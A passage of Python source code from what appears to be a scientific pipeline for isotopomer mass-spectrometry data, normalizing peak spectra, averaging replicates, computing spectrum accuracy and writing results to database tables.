precursor_formula, precursor_mass = self.stage01_isotopomer_query.get_precursorFormulaAndMass_experimentIDAndTimePointAndSampleNameAbbreviationAndScanTypeAndReplicateAndMetID_peakSpectrum(\
experiment_id_I,tp,sna,scantype,rep,met);
peak_data_all = {};
scaling_factors_all = {};
for precursor_cnt, precursor in enumerate(precursor_formula):
peak_data_all[precursor] = None;
scaling_factors_all[precursor] = None;
print('normalizing peak spectrum from reference for precursor ' + precursor);
precursor_str = re.sub('[+-]', '', precursor);
# get all product fragments for the met_id/precursor
product_formulas = [];
product_formulas = self.stage01_isotopomer_query.get_productFormulas_experimentIDAndTimePointAndSampleNameAbbreviationAndScanTypeAndReplicateAndMetIDAndPrecursorFormula_peakSpectrum(\
experiment_id_I,tp,sna,scantype,rep,met,precursor);
# get the m+0 precursor_formula
precursor_formula_monoisotopic = self.stage01_isotopomer_query.get_precursorFormula_metID(met,'-','tuning');
precursor_monoisotopic_str = re.sub('[+-]', '', precursor_formula_monoisotopic);
precursor_monoisotpoic_mass = int(numpy.round(Formula(precursor_monoisotopic_str).isotope.mass));
# get peakSpectrum data
peak_data = {};
peak_data = self.stage01_isotopomer_query.get_data_experimentIDAndTimePointAndSampleNameAbbreviationAndScanTypeAndReplicateAndMetIDAndPrecursorFormula_peakSpectrum(\
experiment_id_I,tp,sna,scantype,rep,met,precursor);
peak_data_all[precursor] = peak_data;
if scantype == 'ER':
scaling_factors_all[precursor] = 1.0; # there is no need to scale ER or other precursor ion scans
else:
if use_mrm_ref:
# get reference MRM spectrum scaling factor for the sample
#scaling_factor,scaling_factor_cv = None,None; # will need to incorporate propogation of error
#scaling_factor,scaling_factor_cv = self.stage01_isotopomer_query.get_normalizedIntensity_experimentIDAndSampleAbbreviationAndTimePointAndMetIDAndFragmentFormulaAndMassAndScanType_dataStage01Averages(experiment_id_I,sample_name_abbreviation,time_point,met,precursor_formula_monoisotopic,precursor_mass[precursor_cnt],'MRM');
scaling_factor = None; # does not require the propogation of error
scaling_factor = self.stage01_isotopomer_query.get_normalizedIntensity_experimentIDAndSampleAbbreviationAndTimePointAndReplicateNumberAndMetIDAndFragmentFormulaAndMassAndScanType_dataStage01Normalized(experiment_id_I,sna,tp,rep,met,precursor_formula_monoisotopic,precursor_mass[precursor_cnt],'MRM');
if scaling_factor: scaling_factors_all[precursor] = scaling_factor;
else:
scaling_factors_all[precursor] = 0.0;
## substitute with reference spectrum
#refspec = self.report_fragmentSpectrum_normMax([precursor_formula_monoisotopic],True);
#scaling_factor = refspec[precursor_formula_monoisotopic][precursor_mass[precursor_cnt]];
#scaling_factors_all[precursor] = scaling_factor;
else:
# get reference ER spectrum scaling factor for the sample
scaling_factor = None;
scaling_factor = self.stage01_isotopomer_query.get_normalizedIntensity_experimentIDAndSampleAbbreviationAndTimePointAndReplicateNumberAndMetIDAndPrecursorFormulaAndMassAndScanType_peakSpectrum(experiment_id_I,sna,tp,rep,met,precursor_formula_monoisotopic,precursor_mass[precursor_cnt],'ER');
if scaling_factor: scaling_factors_all[precursor] = scaling_factor;
else:
scaling_factors_all[precursor] = 0.0;
## substitute with reference spectrum
#refspec = self.report_fragmentSpectrum_normMax([precursor_formula_monoisotopic],True);
#scaling_factor = refspec[precursor_formula_monoisotopic][precursor_mass[precursor_cnt]];
#scaling_factors_all[precursor] = scaling_factor;
# normalize spectrum to reference MRM for each precursor (m+0,m+1,...)
peakSpectrum_normalized = self.normalize_peakSpectrum_normMax(peak_data_all,scaling_factors_all);
peakSpectrum_stats,peakSpectrum_theoretical = self.compare_peakSpectrum_normMax([peakSpectrum_normalized],True);
# update data_stage01_isotopomer_peakSpectrum
for frag,spec in peakSpectrum_theoretical.items():
if spec:
product_str = re.sub('[+-]', '', frag);
product_mass = Formula(product_str).isotope.mass;
for k,v in peakSpectrum_theoretical[frag].items():
if k in peakSpectrum_normalized[frag]:
row = None;
row = data_stage01_isotopomer_normalized(experiment_id_I,sample_name,sna,sample_types_lst[sna_cnt],tp,dilution,rep,
met,frag,int(numpy.round(k)),
#None,'cps',None,'cps',
None,'cps',peakSpectrum_normalized[frag][k],'normMax', #allows for spectrum updates
peakSpectrum_normalized[frag][k],'normMax',
v,peakSpectrum_stats[frag][k]['absDev'],scantype,True,None);
self.session.add(row);
self.session.commit();
    def execute_normalizeSpectrumFromReference_v1(self,experiment_id_I,sample_name_abbreviations_I = None,use_mrm_ref = True):
        # 1. import used peak spectrum to normalized table after multiplying by measured
        # scaling factor calculated from used MRM spectrum
        # 2. be sure that the MRMs in the normalized table have been finalized
        '''NOTES: Broken for the following reason:
        cannot follow the forloop pattern used in buildSpectrumFromPeakData (i.e. starting with sample name)
        must use the forloop pattern used in updateNormalizedSpectrum (i.e. time-point to dilutions to sample name abbreviations to scan types to mets)
        buildSpectrumFromPeakData and updatePeakSpectrum methods process one product:spectrum from a single precursor at a time;
        each precursor:product:spectrum is associated with only one sample name
        However, because the entire range of precursor:product:spectrum for a given met can encompass multiple dilutions and therefore different
        sample names, a more generic approach must be used
        Please use current version'''
        # DEPRECATED: kept for reference only -- see the notes above; do not call.
        # extract out the peakSpectrum
        # get sample name for the experiment
        print('execute_normalizeSpectrumFromReference...')
        if sample_name_abbreviations_I:
            # restrict to the requested sample name abbreviations; sample_types_lst
            # tracks the sample type ('Unknown'/'QC') parallel to sample_names
            sample_names = [];
            sample_types = ['Unknown','QC'];
            sample_types_lst = [];
            for sna in sample_name_abbreviations_I:
                for st in sample_types:
                    sample_names_tmp = [];
                    sample_names_tmp = self.stage01_isotopomer_query.get_sampleNames_experimentIDAndSampleTypeAndSampleNameAbbreviation_peakSpectrum(experiment_id_I,st,sna);
                    sample_names.extend(sample_names_tmp);
                    sample_types_lst.extend([st for i in range(len(sample_names_tmp))]);
        else:
            # no filter given: use every sample name found for the experiment
            sample_names = [];
            sample_types = ['Unknown','QC'];
            sample_types_lst = [];
            for st in sample_types:
                sample_names_tmp = [];
                sample_names_tmp = self.stage01_isotopomer_query.get_sampleNames_experimentIDAndSampleType_peakSpectrum(experiment_id_I,st);
                sample_names.extend(sample_names_tmp);
                sample_types_lst.extend([st for i in range(len(sample_names_tmp))]);
        for sn_cnt,sn in enumerate(sample_names):
            print('normalizing peak spectrum for sample ' + sn);
            # get other information about the sample for later use
            sample_name_abbreviation,time_point,dilution,replicate_numbers = None,None,None,None;
            sample_name_abbreviation,time_point,dilution,replicate_numbers = self.stage01_isotopomer_query.get_sampleNameAbbreviationsAndOther_experimentIDAndSampleName_peakSpectrum(experiment_id_I,sn);
            # get met_id and precursor_formula for each sample
            scan_type = [];
            scan_type = self.stage01_isotopomer_query.get_scanType_experimentIDAndSampleName_peakSpectrum(experiment_id_I,sn);
            for scantype in scan_type:
                print('normalizing spectrum for scan type ' + scantype);
                # get met_id
                # NOTE(review): 'med_id' below looks like a typo of 'met_id'; it is
                # harmless only because met_id is assigned on the next line.
                med_id = [];
                met_id = self.stage01_isotopomer_query.get_metID_experimentIDAndSampleNameAndScanType_peakSpectrum(experiment_id_I,sn,scantype);
                for met in met_id:
                    print('normalizing peak spectrum for met_id ' + met);
                    # get precursor formula and mass
                    precursor_formula, precursor_mass = [], [];
                    precursor_formula, precursor_mass = self.stage01_isotopomer_query.get_precursorFormulaAndMass_experimentIDAndSampleNameAndMetIDAndScanType_peakSpectrum(experiment_id_I,sn,met,scantype);
                    peak_data_all = {};
                    scaling_factors_all = {};
                    for precursor_cnt, precursor in enumerate(precursor_formula):
                        peak_data_all[precursor] = None;
                        scaling_factors_all[precursor] = None;
                        print('normalizing peak spectrum for precursor ' + precursor);
                        # strip charge signs to get a plain elemental formula string
                        precursor_str = re.sub('[+-]', '', precursor);
                        # get all product fragments for the met_id/precursor
                        product_formulas = [];
                        product_formulas = self.stage01_isotopomer_query.get_productFormulas_experimentIDAndSampleNameAndMetIDAndPrecursorFormulaAndScanType_peakSpectrum(experiment_id_I,sn,met,precursor,scantype);
                        # get the m+0 precursor_formula
                        precursor_formula_monoisotopic = self.stage01_isotopomer_query.get_precursorFormula_metID(met,'-','tuning');
                        precursor_monoisotopic_str = re.sub('[+-]', '', precursor_formula_monoisotopic);
                        precursor_monoisotpoic_mass = int(numpy.round(Formula(precursor_monoisotopic_str).isotope.mass));
                        # get peakSpectrum data
                        # NOTE(review): the query that should populate peak_data is commented
                        # out below, so peak_data_all only ever holds empty dicts here --
                        # this is part of why this version is marked broken.
                        peak_data = {};
                        #Change to sna+rep+timepoint:peak_data = self.stage01_isotopomer_query.get_normalizedIntensity_experimentIDAndSampleNameAndMetIDAndPrecursorFormulaAndScanType_peakSpectrum(experiment_id_I,sn,met,precursor,scantype);
                        peak_data_all[precursor] = peak_data;
                        if scantype == 'ER':
                            scaling_factors_all[precursor] = 1.0; # there is no need to scale ER or other precursor ion scans
                        else:
                            if use_mrm_ref:
                                # get reference MRM spectrum scaling factor for the sample
                                #scaling_factor,scaling_factor_cv = None,None; # will need to incorporate propogation of error
                                #scaling_factor,scaling_factor_cv = self.stage01_isotopomer_query.get_normalizedIntensity_experimentIDAndSampleAbbreviationAndTimePointAndMetIDAndFragmentFormulaAndMassAndScanType_dataStage01Averages(experiment_id_I,sample_name_abbreviation,time_point,met,precursor_formula_monoisotopic,precursor_mass[precursor_cnt],'MRM');
                                scaling_factor = None; # does not require the propogation of error
                                scaling_factor = self.stage01_isotopomer_query.get_normalizedIntensity_experimentIDAndSampleAbbreviationAndTimePointAndReplicateNumberAndMetIDAndFragmentFormulaAndMassAndScanType_dataStage01Normalized(experiment_id_I,sample_name_abbreviation,time_point,replicate_numbers,met,precursor_formula_monoisotopic,precursor_mass[precursor_cnt],'MRM');
                                if scaling_factor: scaling_factors_all[precursor] = scaling_factor;
                                else:
                                    scaling_factors_all[precursor] = 0.0;
                                    ## substitute with reference spectrum
                                    #refspec = self.report_fragmentSpectrum_normMax([precursor_formula_monoisotopic],True);
                                    #scaling_factor = refspec[precursor_formula_monoisotopic][precursor_mass[precursor_cnt]];
                                    #scaling_factors_all[precursor] = scaling_factor;
                            else:
                                # get reference ER spectrum scaling factor for the sample
                                scaling_factor = None;
                                scaling_factor = self.stage01_isotopomer_query.get_normalizedIntensity_experimentIDAndSampleAbbreviationAndTimePointAndReplicateNumberAndMetIDAndPrecursorFormulaAndMassAndScanType_peakSpectrum(experiment_id_I,sample_name_abbreviation,time_point,replicate_numbers,met,precursor_formula_monoisotopic,precursor_mass[precursor_cnt],'ER');
                                if scaling_factor: scaling_factors_all[precursor] = scaling_factor;
                                else:
                                    scaling_factors_all[precursor] = 0.0;
                                    ## substitute with reference spectrum
                                    #refspec = self.report_fragmentSpectrum_normMax([precursor_formula_monoisotopic],True);
                                    #scaling_factor = refspec[precursor_formula_monoisotopic][precursor_mass[precursor_cnt]];
                                    #scaling_factors_all[precursor] = scaling_factor;
                    # normalize spectrum to reference MRM for each precursor (m+0,m+1,...)
                    peakSpectrum_normalized = self.normalize_peakSpectrum_normMax(peak_data_all,scaling_factors_all);
                    peakSpectrum_stats,peakSpectrum_theoretical = self.compare_peakSpectrum_normMax([peakSpectrum_normalized],True);
                    # update data_stage01_isotopomer_peakSpectrum
                    for frag,spec in peakSpectrum_theoretical.items():
                        if spec:
                            product_str = re.sub('[+-]', '', frag);
                            product_mass = Formula(product_str).isotope.mass;
                            for k,v in peakSpectrum_theoretical[frag].items():
                                if k in peakSpectrum_normalized[frag]:
                                    row = None;
                                    # NOTE(review): replicate_numbers (as returned by the query
                                    # above) is passed whole as the replicate field -- confirm the
                                    # ORM class expects that rather than a single replicate number.
                                    row = data_stage01_isotopomer_normalized(experiment_id_I,sn,sample_name_abbreviation,sample_types_lst[sn_cnt],time_point,dilution,replicate_numbers,
                                        met,frag,int(numpy.round(k)),
                                        None,'cps',None,'cps',
                                        peakSpectrum_normalized[frag][k],'normMax',
                                        v,peakSpectrum_stats[frag][k]['absDev'],scantype,True);
                                    self.session.add(row);
        self.session.commit();
def execute_analyzeAveragesNormSum(self,experiment_id_I, sample_names_I = None, sample_name_abbreviations_I = None, met_ids_I = None, scan_types_I = None):
'''calculate the average normalized intensity for all samples and scan types'''
'''Assumptions:
only a single fragment:spectrum is used_ per sample name abbreviation, time-point, replicate, scan_type
(i.e. there are no multiple dilutions of the same precursor:spectrum that are used_)
'''
print('execute_analyzeAveragesNormSum...')
# get time points
time_points = self.stage01_isotopomer_query.get_timePoint_experimentID_dataStage01Normalized(experiment_id_I);
for tp in time_points:
print('Calculating average precursor and product spectrum from isotopomer normalized for time-point ' + str(tp));
if sample_names_I:
sample_abbreviations = [];
sample_types = ['Unknown','QC'];
sample_types_lst = [];
for sn in sample_names_I:
for st in sample_types:
sample_abbreviations_tmp = [];
sample_abbreviations_tmp = self.stage01_isotopomer_query.get_sampleNameAbbreviations_experimentIDAndSampleTypeAndTimePointAndSampleName_dataStage01Normalized(experiment_id_I,st,tp,sn);
sample_abbreviations.extend(sample_abbreviations_tmp);
sample_types_lst.extend([st for i in range(len(sample_names_tmp))]);
elif sample_name_abbreviations_I:
sample_abbreviations = sample_name_abbreviations_I;
sample_types_lst = ['Unknown' for x in sample_abbreviations];
# query sample types from sample name abbreviations and time-point from data_stage01_isotopomer_normalized
else:
# get sample names and sample name abbreviations
sample_abbreviations = [];
sample_types = ['Unknown','QC'];
sample_types_lst = [];
for st in sample_types:
sample_abbreviations_tmp = [];
sample_abbreviations_tmp = self.stage01_isotopomer_query.get_sampleNameAbbreviations_experimentIDAndSampleTypeAndTimePoint_dataStage01Normalized(experiment_id_I,st,tp);
sample_abbreviations.extend(sample_abbreviations_tmp);
sample_types_lst.extend([st for i in range(len(sample_abbreviations_tmp))]);
for sna_cnt,sna in enumerate(sample_abbreviations):
print('Calculating average precursor and product spectrum from isotopomer normalized for sample name abbreviation ' + sna);
# get the scan_types
if scan_types_I:
scan_types = [];
scan_types_tmp = [];
scan_types_tmp = self.stage01_isotopomer_query.get_scanTypes_experimentIDAndTimePointAndSampleAbbreviationsAndSampleType_dataStage01Normalized(experiment_id_I,tp,sna,sample_types_lst[sna_cnt]);
scan_types = [st for st in scan_types_tmp if st in scan_types_I];
else:
scan_types = [];
scan_types = self.stage01_isotopomer_query.get_scanTypes_experimentIDAndTimePointAndSampleAbbreviationsAndSampleType_dataStage01Normalized(experiment_id_I,tp,sna,sample_types_lst[sna_cnt]);
for scan_type in scan_types:
print('Calculating average precursor and product spectrum for scan type ' + scan_type)
# met_ids
if not met_ids_I:
met_ids = [];
met_ids = self.stage01_isotopomer_query.get_metIDs_experimentIDAndSampleAbbreviationAndTimePointAndSampleTypeAndScanType_dataStage01Normalized( \
experiment_id_I,sna,tp,sample_types_lst[sna_cnt],scan_type);
else:
met_ids = met_ids_I;
if not(met_ids): continue #no component information was found
for met in met_ids:
print('Calculating average precursor and product spectrum for metabolite ' + met);
# get replicates
replicate_numbers = [];
replicate_numbers = self.stage01_isotopomer_query.get_replicateNumbers_experimentIDAndSampleAbbreviationAndTimePointAndScanTypeAndMetID_dataStage01Normalized( \
experiment_id_I,sna,tp,scan_type,met);
peakSpectrum_normalized_lst = [];
for rep in replicate_numbers:
print('Calculating average precursor and product spectrum for replicate_number ' + str(rep));
#get data
peakData_I = {};
peakData_I = self.stage01_isotopomer_query.get_dataNormalized_experimentIDAndSampleAbbreviationAndTimePointAndScanTypeAndMetIDAndReplicateNumber_dataStage01Normalized( \
experiment_id_I,sna,tp,scan_type,met,rep);
fragment_formulas = list(peakData_I.keys());
peakSpectrum_corrected, peakSpectrum_normalized = self.extract_peakList_normSum(\
peakData_I, fragment_formulas, True);
peakSpectrum_normalized_lst.append(peakSpectrum_normalized);
peakSpectrum_stats,peakSpectrum_theoretical = self.compare_peakSpectrum_normSum(peakSpectrum_normalized_lst,True);
# update data_stage01_isotopomer_normalized
for frag,spec in peakSpectrum_theoretical.items():
if spec:
fragment_str = re.sub('[+-]', '', frag);
fragment_mass = Formula(fragment_str).isotope.mass;
for k,v in peakSpectrum_theoretical[frag].items():
if v and k in peakSpectrum_stats[frag]:
if peakSpectrum_stats[frag][k]['mean']> 0.0: intensities_cv = peakSpectrum_stats[frag][k]['stdDev']/peakSpectrum_stats[frag][k]['mean']*100;
else: intensities_cv = 0.0;
row = [];
row = data_stage01_isotopomer_averagesNormSum(experiment_id_I, sna, sample_types_lst[sna_cnt], tp, met,frag, k,
peakSpectrum_stats[frag][k]['n'], peakSpectrum_stats[frag][k]['mean'], intensities_cv,
'normSum', v, peakSpectrum_stats[frag][k]['absDev'], scan_type, True);
elif v and k not in peakSpectrum_stats[frag]:
intensities_cv = None;
row = [];
row = data_stage01_isotopomer_averagesNormSum(experiment_id_I, sna, sample_types_lst[sna_cnt], tp, met,frag, k,
None, None, intensities_cv,
'normSum', v, None, scan_type, True);
elif not v and k in peakSpectrum_stats[frag]:
if peakSpectrum_stats[frag][k]['mean']> 0.0: intensities_cv = peakSpectrum_stats[frag][k]['stdDev']/peakSpectrum_stats[frag][k]['mean']*100;
else: intensities_cv = 0.0;
row = [];
row = data_stage01_isotopomer_averagesNormSum(experiment_id_I, sna, sample_types_lst[sna_cnt], tp, met,frag, k,
peakSpectrum_stats[frag][k]['n'], peakSpectrum_stats[frag][k]['mean'], intensities_cv,
'normSum', None, peakSpectrum_stats[frag][k]['absDev'], scan_type, True);
self.session.add(row);
self.session.commit();
def execute_analyzeSpectrumAccuracy(self,experiment_id_I, sample_names_I = None, sample_name_abbreviations_I = None, met_ids_I = None, scan_types_I = None):
'''calculate the average spectrum accuracy'''
print('execute_analyzeSpectrumAccuracy...')
# get time points
time_points = self.stage01_isotopomer_query.get_timePoint_experimentID_dataStage01Normalized(experiment_id_I);
for tp in time_points:
print('Calculating spectrum accuracy from isotopomer normalized for time-point ' + str(tp));
if sample_names_I:
sample_abbreviations = [];
sample_types = ['Unknown','QC'];
sample_types_lst = [];
for sn in sample_names_I:
for st in sample_types:
sample_abbreviations_tmp = [];
sample_abbreviations_tmp = self.stage01_isotopomer_query.get_sampleNameAbbreviations_experimentIDAndSampleTypeAndTimePointAndSampleName_dataStage01Normalized(experiment_id_I,st,tp,sn);
sample_abbreviations.extend(sample_abbreviations_tmp);
sample_types_lst.extend([st for i in range(len(sample_names_tmp))]);
elif sample_name_abbreviations_I:
sample_abbreviations = sample_name_abbreviations_I;
# query sample types from sample name abbreviations and time-point from data_stage01_isotopomer_normalized
else:
# get sample names and sample name abbreviations
sample_abbreviations = [];
sample_types = ['Unknown','QC'];
sample_types_lst = [];
for st in sample_types:
sample_abbreviations_tmp = [];
sample_abbreviations_tmp = self.stage01_isotopomer_query.get_sampleNameAbbreviations_experimentIDAndSampleTypeAndTimePoint_dataStage01Normalized(experiment_id_I,st,tp);
sample_abbreviations.extend(sample_abbreviations_tmp);
sample_types_lst.extend([st for i in range(len(sample_abbreviations_tmp))]);
for sna_cnt,sna in enumerate(sample_abbreviations):
print('Calculating spectrum accuracy from isotopomer normalized for sample name abbreviation ' + sna);
# get the scan_types
if scan_types_I:
scan_types = [];
scan_types_tmp = [];
scan_types_tmp = self.stage01_isotopomer_query.get_scanTypes_experimentIDAndTimePointAndSampleAbbreviationsAndSampleType_dataStage01Normalized(experiment_id_I,tp,sna,sample_types_lst[sna_cnt]);
scan_types = [st for st in scan_types_tmp if st in scan_types_I];
else:
scan_types = [];
scan_types = self.stage01_isotopomer_query.get_scanTypes_experimentIDAndTimePointAndSampleAbbreviationsAndSampleType_dataStage01Normalized(experiment_id_I,tp,sna,sample_types_lst[sna_cnt]);
for scan_type in scan_types:
print('Calculating spectrum accuracy for scan type ' + scan_type)
# met_ids
if not met_ids_I:
met_ids = [];
met_ids = self.stage01_isotopomer_query.get_metIDs_experimentIDAndSampleAbbreviationAndTimePointAndSampleTypeAndScanType_dataStage01Normalized( \
experiment_id_I,sna,tp,sample_types_lst[sna_cnt],scan_type);
else:
met_ids = met_ids_I;
if not(met_ids): continue #no component information was found
for met in met_ids:
print('Calculating spectrum accuracy for metabolite ' + met);
replicate_numbers = [];
replicate_numbers = self.stage01_isotopomer_query.get_replicateNumbers_experimentIDAndSampleAbbreviationAndTimePointAndScanTypeAndMetID_dataStage01Normalized( \
experiment_id_I,sna,tp,scan_type,met);
peakSpectrum_normalized_lst = [];
for rep in replicate_numbers:
print('Calculating spectrum accuracy for replicate_number ' + str(rep));
#get data
peakData_I = {};
peakData_I = self.stage01_isotopomer_query.get_dataNormalized_experimentIDAndSampleAbbreviationAndTimePointAndScanTypeAndMetIDAndReplicateNumber_dataStage01Normalized( \
experiment_id_I,sna,tp,scan_type,met,rep);
fragment_formulas = list(peakData_I.keys());
peakSpectrum_corrected, peakSpectrum_normalized = self.extract_peakList_normMax(\
peakData_I, fragment_formulas, True);
peakSpectrum_normalized_lst.append(peakSpectrum_normalized);
peakSpectrum_accuracy = self.calculate_fragmentSpectrumAccuracy(peakSpectrum_normalized_lst);
# update data_stage01_isotopomer_spectrumAccuracy
for frag,accuracy in peakSpectrum_accuracy.items():
if accuracy:
row = [];
row = data_stage01_isotopomer_spectrumAccuracy(experiment_id_I, sna, sample_types_lst[sna_cnt], tp, met,frag, accuracy, scan_type, True);
self.session.add(row);
self.session.commit();
def execute_analyzeSpectrumAccuracyNormSum(self,experiment_id_I, sample_names_I = None, sample_name_abbreviations_I = None, met_ids_I = None, scan_types_I = None):
'''calculate the average spectrum accuracy'''
print('execute_analyzeSpectrumAccuracy...')
# get time points
time_points = self.stage01_isotopomer_query.get_timePoint_experimentID_dataStage01Normalized(experiment_id_I);
for tp in time_points:
print('Calculating spectrum accuracy from isotopomer normalized for time-point ' + str(tp));
if sample_names_I:
sample_abbreviations = [];
sample_types = ['Unknown','QC'];
sample_types_lst = [];
for sn in sample_names_I:
for st in sample_types:
sample_abbreviations_tmp = [];
sample_abbreviations_tmp = self.stage01_isotopomer_query.get_sampleNameAbbreviations_experimentIDAndSampleTypeAndTimePointAndSampleName_dataStage01Normalized(experiment_id_I,st,tp,sn);
sample_abbreviations.extend(sample_abbreviations_tmp);
sample_types_lst.extend([st for i in range(len(sample_names_tmp))]);
elif sample_name_abbreviations_I:
sample_abbreviations = sample_name_abbreviations_I;
# query sample types from sample name abbreviations and time-point from data_stage01_isotopomer_normalized
else:
# get sample names and sample name abbreviations
sample_abbreviations = [];
sample_types = ['Unknown','QC'];
sample_types_lst = [];
for st in sample_types:
sample_abbreviations_tmp = [];
sample_abbreviations_tmp = self.stage01_isotopomer_query.get_sampleNameAbbreviations_experimentIDAndSampleTypeAndTimePoint_dataStage01Normalized(experiment_id_I,st,tp);
sample_abbreviations.extend(sample_abbreviations_tmp);
sample_types_lst.extend([st for i in range(len(sample_abbreviations_tmp))]);
for sna_cnt,sna in enumerate(sample_abbreviations):
print('Calculating spectrum accuracy from isotopomer normalized for sample name abbreviation ' + sna);
# get the scan_types
if scan_types_I:
scan_types = [];
scan_types_tmp = [];
scan_types_tmp = self.stage01_isotopomer_query.get_scanTypes_experimentIDAndTimePointAndSampleAbbreviationsAndSampleType_dataStage01Normalized(experiment_id_I,tp,sna,sample_types_lst[sna_cnt]);
scan_types = [st for st in scan_types_tmp if st in scan_types_I];
else:
scan_types = [];
scan_types = self.stage01_isotopomer_query.get_scanTypes_experimentIDAndTimePointAndSampleAbbreviationsAndSampleType_dataStage01Normalized(experiment_id_I,tp,sna,sample_types_lst[sna_cnt]);
for scan_type in scan_types:
print('Calculating spectrum accuracy for scan type ' + scan_type)
# met_ids
if not met_ids_I:
met_ids = [];
met_ids = self.stage01_isotopomer_query.get_metIDs_experimentIDAndSampleAbbreviationAndTimePointAndSampleTypeAndScanType_dataStage01Normalized( \
experiment_id_I,sna,tp,sample_types_lst[sna_cnt],scan_type);
else:
met_ids = met_ids_I;
if not(met_ids): continue #no component information was found
for met in met_ids:
print('Calculating spectrum accuracy for metabolite ' + met);
replicate_numbers = [];
replicate_numbers = self.stage01_isotopomer_query.get_replicateNumbers_experimentIDAndSampleAbbreviationAndTimePointAndScanTypeAndMetID_dataStage01Normalized( \
experiment_id_I,sna,tp,scan_type,met);
peakSpectrum_normalized_lst = [];
for rep in replicate_numbers:
print('Calculating spectrum accuracy for replicate_number ' + str(rep));
#get data
peakData_I = {};
peakData_I = self.stage01_isotopomer_query.get_dataNormalized_experimentIDAndSampleAbbreviationAndTimePointAndScanTypeAndMetIDAndReplicateNumber_dataStage01Normalized( \
experiment_id_I,sna,tp,scan_type,met,rep);
fragment_formulas = list(peakData_I.keys());
peakSpectrum_corrected, peakSpectrum_normalized = self.extract_peakList_normSum(\
peakData_I, fragment_formulas, True);
peakSpectrum_normalized_lst.append(peakSpectrum_normalized);
peakSpectrum_accuracy = self.calculate_fragmentSpectrumAccuracy_normSum(peakSpectrum_normalized_lst);
# update data_stage01_isotopomer_spectrumAccuracy
for frag,accuracy in peakSpectrum_accuracy.items():
if accuracy:
row = [];
row = data_stage01_isotopomer_spectrumAccuracyNormSum(experiment_id_I, sna, sample_types_lst[sna_cnt], tp, met,frag, accuracy, scan_type, True);
self.session.add(row);
self.session.commit();
def execute_makeIsotopomerSimulation_cobraMat(self,csource_name_I, csource_I, csource_mix_I, experiment_id_I, sample_name_abbreviations_I = None, time_points_I = None, met_ids_I = None, scan_types_I = None):
'''export a fluxomics experimental data for simulation using the cobra 2.0 fluxomics module'''
# TODO:
# 1. move to analysis_stage02
# 2. query csource_name, csourse, and csource_mix from database
# calculate the emu for the input_met:
# make carbon input for the experiment:
# 80/20 1-13C/U-13C
#inputfrag = isoexecute.make_CSourceMix([['[13C]HO','CH2O','CH2O','CH2O','CH2O','CH3O'],
# ['[13C]HO','[13C]H2O','[13C]H2O','[13C]H2O','[13C]H2O','[13C]H3O']],
# [0.8,0.2]);
# 30/20/50 1-13C/U-13C/U-12C
#inputfrag = isoexecute.make_CSourceMix([['[13C]HO','CH2O','CH2O','CH2O','CH2O','CH3O'],
# ['[13C]HO','[13C]H2O','[13C]H2O','[13C]H2O','[13C]H2O','[13C]H3O'],
# ['CHO','CH2O','CH2O','CH2O','CH2O','CH3O']],
# [0.3,0.2,0.5]);
# 80/20 1-13C/U-13C
#inputfrag = isoexecute.make_CSourceMix([['[13C]HO','CH2O','CH2O','CH2O','CH2O','CH3O']],
# [1.0]);
inputfrag = self.make_CSourceMix(csource_I,csource_mix_I);
# get experiment information:
met_id_conv_dict = {'Hexose_Pool_fru_glc-D':'glc-D',
'Pool_2pg_3pg':'3pg',
'23dpg':'13dpg'};
# get time points
time_points = self.stage01_isotopomer_query.get_timePoint_experimentID_dataStage01AveragesNormSum(experiment_id_I);
for tp in time_points:
print('Reporting average precursor and product spectrum from isotopomer normalized for time-point ' + str(tp));
if sample_name_abbreviations_I:
sample_abbreviations = sample_name_abbreviations_I;
# query sample types from sample name abbreviations and time-point from data_stage01_isotopomer_normalized
else:
# get sample names and sample name abbreviations
sample_abbreviations = [];
sample_types = ['Unknown','QC'];
sample_types_lst = [];
for st in sample_types:
sample_abbreviations_tmp = [];
sample_abbreviations_tmp = self.stage01_isotopomer_query.get_sampleNameAbbreviations_experimentIDAndSampleTypeAndTimePoint_dataStage01AveragesNormSum(experiment_id_I,st,tp);
sample_abbreviations.extend(sample_abbreviations_tmp);
sample_types_lst.extend([st for i in range(len(sample_abbreviations_tmp))]);
for sna_cnt,sna in enumerate(sample_abbreviations):
# Matlab script file to make the structures
experiment_name = 'Isotopomer_' + re.sub('[.\/]','',experiment_id_I) + '_' + re.sub(' ','',sna) + '_' + re.sub(' ','',str(tp));
filename = 'data/_output/' + 'isotopomer_' + re.sub('[.\/]','',experiment_id_I) + '_' + re.sub(' ','',sna) + '_' + re.sub(' ','',str(tp)) + '.m';
filename_dict = 'data/_output/' + 'isotopomer_' + re.sub('[.\/]','',experiment_id_I) + '_' + re.sub(' ','',sna) + '_' + re.sub(' ','',str(tp)) + '.json';
#filename_mat = 'data/_output/' + 'isotopomer_' + re.sub('[.\/]','',experiment_id_I) + '_' + re.sub(' ','',sna) + '_' + re.sub(' ','',str(tp)) + '.mat';
mat_script = '';
experiment = {};
struct_data = {};
experiment_stdev = [];
#struct_mat_data = {};
#struct_mat_data_list = [];
#struct_mat_dtype_list = [];
print('Reporting average precursor and product spectrum from isotopomer normalized for sample name abbreviation ' + sna);
# get the scan_types
if scan_types_I:
scan_types = [];
scan_types_tmp = [];
scan_types_tmp = self.stage01_isotopomer_query.get_scanTypes_experimentIDAndTimePointAndSampleAbbreviationsAndSampleType_dataStage01AveragesNormSum(experiment_id_I,tp,sna,sample_types_lst[sna_cnt]);
scan_types = [st for st in scan_types_tmp if st in scan_types_I];
else:
scan_types = [];
scan_types = self.stage01_isotopomer_query.get_scanTypes_experimentIDAndTimePointAndSampleAbbreviationsAndSampleType_dataStage01AveragesNormSum(experiment_id_I,tp,sna,sample_types_lst[sna_cnt]);
for scan_type in scan_types:
print('Reporting average precursor and product spectrum for scan type ' + scan_type)
# met_ids
if not met_ids_I:
met_ids = [];
met_ids = self.stage01_isotopomer_query.get_metIDs_experimentIDAndSampleAbbreviationAndTimePointAndSampleTypeAndScanType_dataStage01AveragesNormSum( \
experiment_id_I,sna,tp,sample_types_lst[sna_cnt],scan_type);
else:
met_ids = met_ids_I;
if not(met_ids): continue #no component information was found
for met in met_ids:
print('Reporting average precursor and product spectrum for metabolite ' + met);
# format the metabolite
if met in list(met_id_conv_dict.keys()):
met_formatted = met_id_conv_dict[met];
else: met_formatted = met;
met_formatted = re.sub('-','_DASH_',met_formatted)
met_formatted = re.sub('[(]','_LPARANTHES_',met_formatted)
met_formatted = re.sub('[)]','_RPARANTHES_',met_formatted)
# fragments
fragment_formulas = [];
